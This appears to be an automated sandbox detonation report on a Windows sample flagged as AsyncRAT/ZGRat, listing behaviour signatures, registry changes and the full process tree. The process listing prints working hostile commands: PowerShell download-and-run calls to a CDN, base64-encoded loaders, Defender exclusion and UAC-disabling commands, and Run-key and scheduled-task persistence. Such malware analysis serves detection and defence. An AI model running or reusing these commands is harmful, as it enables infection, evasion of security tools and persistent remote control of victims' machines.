Analysis Overview
SHA256
f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Threat Level: Known bad
The file resources.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
UAC bypass
ZGRat
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies registry key
Creates scheduled task(s)
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Opens file in notepad (likely ransom note)
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-15 10:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-15 10:45
Reported
2023-11-15 10:57
Platform
win10v2004-20231025-en
Max time kernel
527s
Max time network
746s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\public\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\public\music\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\public\downloads\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\admin\downloads\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File opened for modification | \??\c:\users\admin\desktop\desktop.ini | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133445190141227845" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\VisualStudio.csproj
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe
C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe
C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe
C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe
C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe
C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe
C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe
C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\6rs03E3DBT.exe
C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe
C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe
C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe
C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5188 -ip 5188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 804
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
